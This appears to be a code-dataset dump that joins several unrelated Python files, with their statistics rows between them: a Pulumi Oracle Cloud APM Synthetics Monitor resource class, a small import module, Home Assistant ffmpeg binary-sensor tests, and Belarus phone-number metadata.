vantage_points: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
"""
This resource provides the Monitor resource in Oracle Cloud Infrastructure Apm Synthetics service.
Creates a new monitor.
## Example Usage
```python
import pulumi
import pulumi_oci as oci
test_monitor = oci.apmsynthetics.Monitor("testMonitor",
apm_domain_id=oci_apm_synthetics_apm_domain["test_apm_domain"]["id"],
display_name=var["monitor_display_name"],
monitor_type=var["monitor_monitor_type"],
repeat_interval_in_seconds=var["monitor_repeat_interval_in_seconds"],
vantage_points=[{}],
configuration=oci.apmsynthetics.MonitorConfigurationArgs(
config_type=var["monitor_configuration_config_type"],
is_certificate_validation_enabled=var["monitor_configuration_is_certificate_validation_enabled"],
is_failure_retried=var["monitor_configuration_is_failure_retried"],
is_redirection_enabled=var["monitor_configuration_is_redirection_enabled"],
req_authentication_details=oci.apmsynthetics.MonitorConfigurationReqAuthenticationDetailsArgs(
auth_headers=[oci.apmsynthetics.MonitorConfigurationReqAuthenticationDetailsAuthHeaderArgs(
header_name=var["monitor_configuration_req_authentication_details_auth_headers_header_name"],
header_value=var["monitor_configuration_req_authentication_details_auth_headers_header_value"],
)],
auth_request_method=var["monitor_configuration_req_authentication_details_auth_request_method"],
auth_request_post_body=var["monitor_configuration_req_authentication_details_auth_request_post_body"],
auth_token=var["monitor_configuration_req_authentication_details_auth_token"],
auth_url=var["monitor_configuration_req_authentication_details_auth_url"],
auth_user_name=oci_identity_user["test_user"]["name"],
auth_user_password=var["monitor_configuration_req_authentication_details_auth_user_password"],
oauth_scheme=var["monitor_configuration_req_authentication_details_oauth_scheme"],
),
req_authentication_scheme=var["monitor_configuration_req_authentication_scheme"],
request_headers=[oci.apmsynthetics.MonitorConfigurationRequestHeaderArgs(
header_name=var["monitor_configuration_request_headers_header_name"],
header_value=var["monitor_configuration_request_headers_header_value"],
)],
request_method=var["monitor_configuration_request_method"],
request_post_body=var["monitor_configuration_request_post_body"],
request_query_params=[oci.apmsynthetics.MonitorConfigurationRequestQueryParamArgs(
param_name=var["monitor_configuration_request_query_params_param_name"],
param_value=var["monitor_configuration_request_query_params_param_value"],
)],
verify_response_codes=var["monitor_configuration_verify_response_codes"],
verify_response_content=var["monitor_configuration_verify_response_content"],
verify_texts=[oci.apmsynthetics.MonitorConfigurationVerifyTextArgs(
text=var["monitor_configuration_verify_texts_text"],
)],
),
defined_tags={
"foo-namespace.bar-key": "value",
},
freeform_tags={
"bar-key": "value",
},
script_id=oci_apm_synthetics_script["test_script"]["id"],
script_parameters=[oci.apmsynthetics.MonitorScriptParameterArgs(
param_name=var["monitor_script_parameters_param_name"],
param_value=var["monitor_script_parameters_param_value"],
)],
status=var["monitor_status"],
target=var["monitor_target"],
timeout_in_seconds=var["monitor_timeout_in_seconds"])
```
## Import
Monitors can be imported using the `id`, e.g.
```sh
$ pulumi import oci:apmsynthetics/monitor:Monitor test_monitor "monitors/{monitorId}/apmDomainId/{apmDomainId}"
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] apm_domain_id: (Updatable) The APM domain ID the request is intended for.
:param pulumi.Input[pulumi.InputType['MonitorConfigurationArgs']] configuration: (Updatable) Details of monitor configuration.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. Example: `{"foo-namespace.bar-key": "value"}`
:param pulumi.Input[str] display_name: (Updatable) Unique name that can be edited. The name should not contain any confidential information.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
:param pulumi.Input[str] monitor_type: Type of monitor.
:param pulumi.Input[int] repeat_interval_in_seconds: (Updatable) Interval in seconds after the start time when the job should be repeated. Minimum repeatIntervalInSeconds should be 300 seconds.
:param pulumi.Input[str] script_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the script. scriptId is mandatory for creation of SCRIPTED_BROWSER and SCRIPTED_REST monitor types. For other monitor types, it should be set to null.
:param pulumi.Input[str] script_name: Name of the script.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MonitorScriptParameterArgs']]]] script_parameters: (Updatable) List of script parameters in the monitor. This is valid only for SCRIPTED_BROWSER and SCRIPTED_REST monitor types. For other monitor types, it should be set to null. Example: `[{"paramName": "userid", "paramValue":"testuser"}]`
:param pulumi.Input[str] status: (Updatable) Enables or disables the monitor.
:param pulumi.Input[str] target: (Updatable) Specify the endpoint on which to run the monitor. For BROWSER and REST monitor types, target is mandatory. If target is specified in the SCRIPTED_BROWSER monitor type, then the monitor will run the selected script (specified by scriptId in monitor) against the specified target endpoint. If target is not specified in the SCRIPTED_BROWSER monitor type, then the monitor will run the selected script as it is.
:param pulumi.Input[int] timeout_in_seconds: (Updatable) Timeout in seconds. Timeout cannot be more than 30% of repeatIntervalInSeconds time for monitors. Also, timeoutInSeconds should be a multiple of 60. Monitor will be allowed to run only for timeoutInSeconds time. It would be terminated after that.
:param pulumi.Input[Sequence[pulumi.Input[str]]] vantage_points: (Updatable) A list of vantage points from which to execute the monitor. Use /publicVantagePoints to fetch public vantage points.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: MonitorArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
This resource provides the Monitor resource in Oracle Cloud Infrastructure Apm Synthetics service.
Creates a new monitor.
## Example Usage
```python
import pulumi
import pulumi_oci as oci
test_monitor = oci.apmsynthetics.Monitor("testMonitor",
apm_domain_id=oci_apm_synthetics_apm_domain["test_apm_domain"]["id"],
display_name=var["monitor_display_name"],
monitor_type=var["monitor_monitor_type"],
repeat_interval_in_seconds=var["monitor_repeat_interval_in_seconds"],
vantage_points=[{}],
configuration=oci.apmsynthetics.MonitorConfigurationArgs(
config_type=var["monitor_configuration_config_type"],
is_certificate_validation_enabled=var["monitor_configuration_is_certificate_validation_enabled"],
is_failure_retried=var["monitor_configuration_is_failure_retried"],
is_redirection_enabled=var["monitor_configuration_is_redirection_enabled"],
req_authentication_details=oci.apmsynthetics.MonitorConfigurationReqAuthenticationDetailsArgs(
auth_headers=[oci.apmsynthetics.MonitorConfigurationReqAuthenticationDetailsAuthHeaderArgs(
header_name=var["monitor_configuration_req_authentication_details_auth_headers_header_name"],
header_value=var["monitor_configuration_req_authentication_details_auth_headers_header_value"],
)],
auth_request_method=var["monitor_configuration_req_authentication_details_auth_request_method"],
auth_request_post_body=var["monitor_configuration_req_authentication_details_auth_request_post_body"],
auth_token=var["monitor_configuration_req_authentication_details_auth_token"],
auth_url=var["monitor_configuration_req_authentication_details_auth_url"],
auth_user_name=oci_identity_user["test_user"]["name"],
auth_user_password=var["monitor_configuration_req_authentication_details_auth_user_password"],
oauth_scheme=var["monitor_configuration_req_authentication_details_oauth_scheme"],
),
req_authentication_scheme=var["monitor_configuration_req_authentication_scheme"],
request_headers=[oci.apmsynthetics.MonitorConfigurationRequestHeaderArgs(
header_name=var["monitor_configuration_request_headers_header_name"],
header_value=var["monitor_configuration_request_headers_header_value"],
)],
request_method=var["monitor_configuration_request_method"],
request_post_body=var["monitor_configuration_request_post_body"],
request_query_params=[oci.apmsynthetics.MonitorConfigurationRequestQueryParamArgs(
param_name=var["monitor_configuration_request_query_params_param_name"],
param_value=var["monitor_configuration_request_query_params_param_value"],
)],
verify_response_codes=var["monitor_configuration_verify_response_codes"],
verify_response_content=var["monitor_configuration_verify_response_content"],
verify_texts=[oci.apmsynthetics.MonitorConfigurationVerifyTextArgs(
text=var["monitor_configuration_verify_texts_text"],
)],
),
defined_tags={
"foo-namespace.bar-key": "value",
},
freeform_tags={
"bar-key": "value",
},
script_id=oci_apm_synthetics_script["test_script"]["id"],
script_parameters=[oci.apmsynthetics.MonitorScriptParameterArgs(
param_name=var["monitor_script_parameters_param_name"],
param_value=var["monitor_script_parameters_param_value"],
)],
status=var["monitor_status"],
target=var["monitor_target"],
timeout_in_seconds=var["monitor_timeout_in_seconds"])
```
## Import
Monitors can be imported using the `id`, e.g.
```sh
$ pulumi import oci:apmsynthetics/monitor:Monitor test_monitor "monitors/{monitorId}/apmDomainId/{apmDomainId}"
```
:param str resource_name: The name of the resource.
:param MonitorArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(MonitorArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
apm_domain_id: Optional[pulumi.Input[str]] = None,
configuration: Optional[pulumi.Input[pulumi.InputType['MonitorConfigurationArgs']]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
monitor_type: Optional[pulumi.Input[str]] = None,
repeat_interval_in_seconds: Optional[pulumi.Input[int]] = None,
script_id: Optional[pulumi.Input[str]] = None,
script_name: Optional[pulumi.Input[str]] = None,
script_parameters: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MonitorScriptParameterArgs']]]]] = None,
status: Optional[pulumi.Input[str]] = None,
target: Optional[pulumi.Input[str]] = None,
timeout_in_seconds: Optional[pulumi.Input[int]] = None,
vantage_points: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = MonitorArgs.__new__(MonitorArgs)
if apm_domain_id is None and not opts.urn:
raise TypeError("Missing required property 'apm_domain_id'")
__props__.__dict__["apm_domain_id"] = apm_domain_id
__props__.__dict__["configuration"] = configuration
__props__.__dict__["defined_tags"] = defined_tags
if display_name is None and not opts.urn:
raise TypeError("Missing required property 'display_name'")
__props__.__dict__["display_name"] = display_name
__props__.__dict__["freeform_tags"] = freeform_tags
if monitor_type is None and not opts.urn:
raise TypeError("Missing required property 'monitor_type'")
__props__.__dict__["monitor_type"] = monitor_type
if repeat_interval_in_seconds is None and not opts.urn:
raise TypeError("Missing required property 'repeat_interval_in_seconds'")
__props__.__dict__["repeat_interval_in_seconds"] = repeat_interval_in_seconds
__props__.__dict__["script_id"] = script_id
__props__.__dict__["script_name"] = script_name
__props__.__dict__["script_parameters"] = script_parameters
__props__.__dict__["status"] = status
__props__.__dict__["target"] = target
__props__.__dict__["timeout_in_seconds"] = timeout_in_seconds
if vantage_points is None and not opts.urn:
raise TypeError("Missing required property 'vantage_points'")
__props__.__dict__["vantage_points"] = vantage_points
__props__.__dict__["time_created"] = None
__props__.__dict__["time_updated"] = None
__props__.__dict__["vantage_point_count"] = None
super(Monitor, __self__).__init__(
'oci:apmsynthetics/monitor:Monitor',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
apm_domain_id: Optional[pulumi.Input[str]] = None,
configuration: Optional[pulumi.Input[pulumi.InputType['MonitorConfigurationArgs']]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
monitor_type: Optional[pulumi.Input[str]] = None,
repeat_interval_in_seconds: Optional[pulumi.Input[int]] = None,
script_id: Optional[pulumi.Input[str]] = None,
script_name: Optional[pulumi.Input[str]] = None,
script_parameters: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MonitorScriptParameterArgs']]]]] = None,
status: Optional[pulumi.Input[str]] = None,
target: Optional[pulumi.Input[str]] = None,
time_created: Optional[pulumi.Input[str]] = None,
time_updated: Optional[pulumi.Input[str]] = None,
timeout_in_seconds: Optional[pulumi.Input[int]] = None,
vantage_point_count: Optional[pulumi.Input[int]] = None,
vantage_points: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None) -> 'Monitor':
"""
Get an existing Monitor resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] apm_domain_id: (Updatable) The APM domain ID the request is intended for.
:param pulumi.Input[pulumi.InputType['MonitorConfigurationArgs']] configuration: (Updatable) Details of monitor configuration.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. Example: `{"foo-namespace.bar-key": "value"}`
:param pulumi.Input[str] display_name: (Updatable) Unique name that can be edited. The name should not contain any confidential information.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
:param pulumi.Input[str] monitor_type: Type of monitor.
:param pulumi.Input[int] repeat_interval_in_seconds: (Updatable) Interval in seconds after the start time when the job should be repeated. Minimum repeatIntervalInSeconds should be 300 seconds.
:param pulumi.Input[str] script_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the script. scriptId is mandatory for creation of SCRIPTED_BROWSER and SCRIPTED_REST monitor types. For other monitor types, it should be set to null.
:param pulumi.Input[str] script_name: Name of the script.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MonitorScriptParameterArgs']]]] script_parameters: (Updatable) List of script parameters in the monitor. This is valid only for SCRIPTED_BROWSER and SCRIPTED_REST monitor types. For other monitor types, it should be set to null. Example: `[{"paramName": "userid", "paramValue":"testuser"}]`
:param pulumi.Input[str] status: (Updatable) Enables or disables the monitor.
:param pulumi.Input[str] target: (Updatable) Specify the endpoint on which to run the monitor. For BROWSER and REST monitor types, target is mandatory. If target is specified in the SCRIPTED_BROWSER monitor type, then the monitor will run the selected script (specified by scriptId in monitor) against the specified target endpoint. If target is not specified in the SCRIPTED_BROWSER monitor type, then the monitor will run the selected script as it is.
:param pulumi.Input[str] time_created: The time the resource was created, expressed in [RFC 3339](https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2020-02-12T22:47:12.613Z`
:param pulumi.Input[str] time_updated: The time the resource was updated, expressed in [RFC 3339](https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2020-02-13T22:47:12.613Z`
:param pulumi.Input[int] timeout_in_seconds: (Updatable) Timeout in seconds. Timeout cannot be more than 30% of repeatIntervalInSeconds time for monitors. Also, timeoutInSeconds should be a multiple of 60. Monitor will be allowed to run only for timeoutInSeconds time. It would be terminated after that.
:param pulumi.Input[int] vantage_point_count: Number of vantage points where monitor is running.
:param pulumi.Input[Sequence[pulumi.Input[str]]] vantage_points: (Updatable) A list of vantage points from which to execute the monitor. Use /publicVantagePoints to fetch public vantage points.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _MonitorState.__new__(_MonitorState)
__props__.__dict__["apm_domain_id"] = apm_domain_id
__props__.__dict__["configuration"] = configuration
__props__.__dict__["defined_tags"] = defined_tags
__props__.__dict__["display_name"] = display_name
__props__.__dict__["freeform_tags"] = freeform_tags
__props__.__dict__["monitor_type"] = monitor_type
__props__.__dict__["repeat_interval_in_seconds"] = repeat_interval_in_seconds
__props__.__dict__["script_id"] = script_id
__props__.__dict__["script_name"] = script_name
__props__.__dict__["script_parameters"] = script_parameters
__props__.__dict__["status"] = status
__props__.__dict__["target"] = target
__props__.__dict__["time_created"] = time_created
__props__.__dict__["time_updated"] = time_updated
__props__.__dict__["timeout_in_seconds"] = timeout_in_seconds
__props__.__dict__["vantage_point_count"] = vantage_point_count
__props__.__dict__["vantage_points"] = vantage_points
return Monitor(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="apmDomainId")
def apm_domain_id(self) -> pulumi.Output[str]:
"""
(Updatable) The APM domain ID the request is intended for.
"""
return pulumi.get(self, "apm_domain_id")
@property
@pulumi.getter
def configuration(self) -> pulumi.Output['outputs.MonitorConfiguration']:
"""
(Updatable) Details of monitor configuration.
"""
return pulumi.get(self, "configuration")
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
(Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. Example: `{"foo-namespace.bar-key": "value"}`
"""
return pulumi.get(self, "defined_tags")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[str]:
"""
(Updatable) Unique name that can be edited. The name should not contain any confidential information.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
(Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
"""
return pulumi.get(self, "freeform_tags")
@property
@pulumi.getter(name="monitorType")
def monitor_type(self) -> pulumi.Output[str]:
"""
Type of monitor.
"""
return pulumi.get(self, "monitor_type")
@property
@pulumi.getter(name="repeatIntervalInSeconds")
def repeat_interval_in_seconds(self) -> pulumi.Output[int]:
"""
(Updatable) Interval in seconds after the start time when the job should be repeated. Minimum repeatIntervalInSeconds should be 300 seconds.
"""
return pulumi.get(self, "repeat_interval_in_seconds")
@property
@pulumi.getter(name="scriptId")
def script_id(self) -> pulumi.Output[str]:
"""
(Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the script. scriptId is mandatory for creation of SCRIPTED_BROWSER and SCRIPTED_REST monitor types. For other monitor types, it should be set to null.
"""
return pulumi.get(self, "script_id")
@property
@pulumi.getter(name="scriptName")
def script_name(self) -> pulumi.Output[str]:
"""
Name of the script.
"""
return pulumi.get(self, "script_name")
@property
@pulumi.getter(name="scriptParameters")
def script_parameters(self) -> pulumi.Output[Sequence['outputs.MonitorScriptParameter']]:
"""
(Updatable) List of script parameters in the monitor. This is valid only for SCRIPTED_BROWSER and SCRIPTED_REST monitor types. For other monitor types, it should be set to null. Example: `[{"paramName": "userid", "paramValue":"testuser"}]`
"""
return pulumi.get(self, "script_parameters")
@property
@pulumi.getter
def status(self) -> pulumi.Output[str]:
"""
(Updatable) Enables or disables the monitor.
"""
return pulumi.get(self, "status")
@property
@pulumi.getter
def target(self) -> pulumi.Output[str]:
"""
(Updatable) Specify the endpoint on which to run the monitor. For BROWSER and REST monitor types, target is mandatory. If target is specified in the SCRIPTED_BROWSER monitor type, then the monitor will run the selected script (specified by scriptId in monitor) against the specified target endpoint. If target is not specified in the SCRIPTED_BROWSER monitor type, then the monitor will run the selected script as it is.
"""
return pulumi.get(self, "target")
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> pulumi.Output[str]:
"""
The time the resource was created, expressed in [RFC 3339](https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2020-02-12T22:47:12.613Z`
"""
return pulumi.get(self, "time_created")
@property
@pulumi.getter(name="timeUpdated")
def time_updated(self) -> pulumi.Output[str]:
"""
The time the resource was updated, expressed in [RFC 3339](https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2020-02-13T22:47:12.613Z`
"""
return pulumi.get(self, "time_updated")
@property
@pulumi.getter(name="timeoutInSeconds")
def timeout_in_seconds(self) -> pulumi.Output[int]:
"""
(Updatable) Timeout in seconds. Timeout cannot be more than 30% of repeatIntervalInSeconds time for monitors. Also, timeoutInSeconds should be a multiple of 60. Monitor will be allowed to run only for timeoutInSeconds time. It would be terminated after that.
"""
return pulumi.get(self, "timeout_in_seconds")
@property
@pulumi.getter(name="vantagePointCount")
def vantage_point_count(self) -> pulumi.Output[int]:
"""
Number of vantage points where monitor is running.
"""
return pulumi.get(self, "vantage_point_count")
@property
@pulumi.getter(name="vantagePoints")
def vantage_points(self) -> pulumi.Output[Sequence[str]]:
"""
(Updatable) A list of vantage points from which to execute the monitor. Use /publicVantagePoints to fetch public vantage points.
"""
return pulumi.get(self, "vantage_points")
| 57.279116 | 461 | 0.683365 | 6,796 | 57,050 | 5.508682 | 0.047969 | 0.06758 | 0.062425 | 0.036435 | 0.949435 | 0.937308 | 0.927398 | 0.914817 | 0.908166 | 0.892272 | 0 | 0.005601 | 0.217669 | 57,050 | 995 | 462 | 57.336683 | 0.833191 | 0.479001 | 0 | 0.760077 | 1 | 0 | 0.124274 | 0.032445 | 0 | 0 | 0 | 0 | 0 | 1 | 0.165067 | false | 0.001919 | 0.013436 | 0 | 0.278311 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d29d090674fda2337853bf22ef7e869dbaae9203 | 62 | py | Python | src/core/currency/__init__.py | arnulfojr/money-manager | 8600f1ff258a89f5742ffad4d5f589fd1def5259 | [
"MIT"
] | 1 | 2020-08-18T08:03:44.000Z | 2020-08-18T08:03:44.000Z | src/core/currency/__init__.py | arnulfojr/money-manager | 8600f1ff258a89f5742ffad4d5f589fd1def5259 | [
"MIT"
] | null | null | null | src/core/currency/__init__.py | arnulfojr/money-manager | 8600f1ff258a89f5742ffad4d5f589fd1def5259 | [
"MIT"
] | null | null | null |
from models import Currency
from models import ExchangeRate
| 12.4 | 31 | 0.83871 | 8 | 62 | 6.5 | 0.625 | 0.384615 | 0.615385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16129 | 62 | 4 | 32 | 15.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
d2b999d125595a54ea747fbc7cfbb94e4c48b200 | 3,444 | py | Python | tests/components/binary_sensor/test_ffmpeg.py | loraxx753/skynet | 86a1b0a6c6a3f81bc92d4f61de6a9a6b9f964543 | [
"Apache-2.0"
] | null | null | null | tests/components/binary_sensor/test_ffmpeg.py | loraxx753/skynet | 86a1b0a6c6a3f81bc92d4f61de6a9a6b9f964543 | [
"Apache-2.0"
] | 1 | 2017-03-10T22:17:06.000Z | 2017-03-10T22:17:06.000Z | tests/components/binary_sensor/test_ffmpeg.py | loraxx753/skynet | 86a1b0a6c6a3f81bc92d4f61de6a9a6b9f964543 | [
"Apache-2.0"
] | 1 | 2019-08-04T19:25:10.000Z | 2019-08-04T19:25:10.000Z | """The tests for Home Assistant ffmpeg binary sensor."""
from unittest.mock import patch
from homeassistant.bootstrap import setup_component
from homeassistant.util.async import run_callback_threadsafe
from tests.common import (
get_test_home_assistant, assert_setup_component, mock_coro)
class TestFFmpegNoiseSetup(object):
"""Test class for ffmpeg."""
def setup_method(self):
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
self.config = {
'ffmpeg': {
'run_test': False,
},
'binary_sensor': {
'platform': 'ffmpeg_noise',
'input': 'testinputvideo',
},
}
def teardown_method(self):
"""Stop everything that was started."""
self.hass.stop()
def test_setup_component(self):
"""Setup ffmpeg component."""
with assert_setup_component(1, 'binary_sensor'):
setup_component(self.hass, 'binary_sensor', self.config)
assert self.hass.data['ffmpeg'].binary == 'ffmpeg'
assert len(self.hass.data['ffmpeg'].entities) == 1
@patch('haffmpeg.SensorNoise.open_sensor', return_value=mock_coro())
def test_setup_component_start(self, mock_start):
"""Setup ffmpeg component."""
with assert_setup_component(1, 'binary_sensor'):
setup_component(self.hass, 'binary_sensor', self.config)
assert self.hass.data['ffmpeg'].binary == 'ffmpeg'
assert len(self.hass.data['ffmpeg'].entities) == 1
entity = self.hass.data['ffmpeg'].entities[0]
self.hass.start()
assert mock_start.called
assert entity.state == 'off'
run_callback_threadsafe(
self.hass.loop, entity._async_callback, True).result()
assert entity.state == 'on'
class TestFFmpegMotionSetup(object):
"""Test class for ffmpeg."""
def setup_method(self):
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
self.config = {
'ffmpeg': {
'run_test': False,
},
'binary_sensor': {
'platform': 'ffmpeg_motion',
'input': 'testinputvideo',
},
}
def teardown_method(self):
"""Stop everything that was started."""
self.hass.stop()
def test_setup_component(self):
"""Setup ffmpeg component."""
with assert_setup_component(1, 'binary_sensor'):
setup_component(self.hass, 'binary_sensor', self.config)
assert self.hass.data['ffmpeg'].binary == 'ffmpeg'
assert len(self.hass.data['ffmpeg'].entities) == 1
@patch('haffmpeg.SensorMotion.open_sensor', return_value=mock_coro())
def test_setup_component_start(self, mock_start):
"""Setup ffmpeg component."""
with assert_setup_component(1, 'binary_sensor'):
setup_component(self.hass, 'binary_sensor', self.config)
assert self.hass.data['ffmpeg'].binary == 'ffmpeg'
assert len(self.hass.data['ffmpeg'].entities) == 1
entity = self.hass.data['ffmpeg'].entities[0]
self.hass.start()
assert mock_start.called
assert entity.state == 'off'
run_callback_threadsafe(
self.hass.loop, entity._async_callback, True).result()
assert entity.state == 'on'
| 32.8 | 73 | 0.614692 | 384 | 3,444 | 5.322917 | 0.192708 | 0.086106 | 0.058708 | 0.088063 | 0.842466 | 0.842466 | 0.842466 | 0.842466 | 0.842466 | 0.842466 | 0 | 0.00392 | 0.259292 | 3,444 | 104 | 74 | 33.115385 | 0.797334 | 0 | 0 | 0.753623 | 0 | 0 | 0.130521 | 0.021424 | 0 | 0 | 0 | 0 | 0.275362 | 0 | null | null | 0 | 0.057971 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d2e0106f810e2419cca45ede72c9cf4d31fc9978 | 1,901 | py | Python | python/tests/testdata/region_BY.py | ILMServices/python-phonenumbers | 317b0b128162b031e156b9de69ade9a5c8cf4844 | [
"Apache-2.0"
] | 1 | 2015-01-31T01:17:14.000Z | 2015-01-31T01:17:14.000Z | python/tests/testdata/region_BY.py | ILMServices/python-phonenumbers | 317b0b128162b031e156b9de69ade9a5c8cf4844 | [
"Apache-2.0"
] | null | null | null | python/tests/testdata/region_BY.py | ILMServices/python-phonenumbers | 317b0b128162b031e156b9de69ade9a5c8cf4844 | [
"Apache-2.0"
] | null | null | null | """Auto-generated file, do not edit by hand. BY metadata"""
from phonenumbers.phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
PHONE_METADATA_BY = PhoneMetadata(id='BY', country_code=375, international_prefix='810',
general_desc=PhoneNumberDesc(national_number_pattern='[1-9]\\d{5}', possible_number_pattern='\\d{6}'),
fixed_line=PhoneNumberDesc(national_number_pattern='[1-9]\\d{5}', possible_number_pattern='\\d{6}', example_number='112345'),
mobile=PhoneNumberDesc(national_number_pattern='[1-9]\\d{5}', possible_number_pattern='\\d{6}'),
toll_free=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
premium_rate=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
shared_cost=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
personal_number=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
voip=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
pager=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
uan=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
voicemail=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
no_international_dialling=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
national_prefix='8',
national_prefix_for_parsing='80?|99999',
number_format=[NumberFormat(pattern='(\\d{4})', format='\\1', leading_digits_pattern=['[1-8]'], national_prefix_formatting_rule='8 \\1'),
NumberFormat(pattern='(\\d{2})(\\d{3})', format='\\1 \\2', leading_digits_pattern=['[1-8]'], national_prefix_formatting_rule='8\\1'),
NumberFormat(pattern='(\\d{3})(\\d{3})', format='\\1 \\2', leading_digits_pattern=['[1-8]'], national_prefix_formatting_rule='8 \\1')])
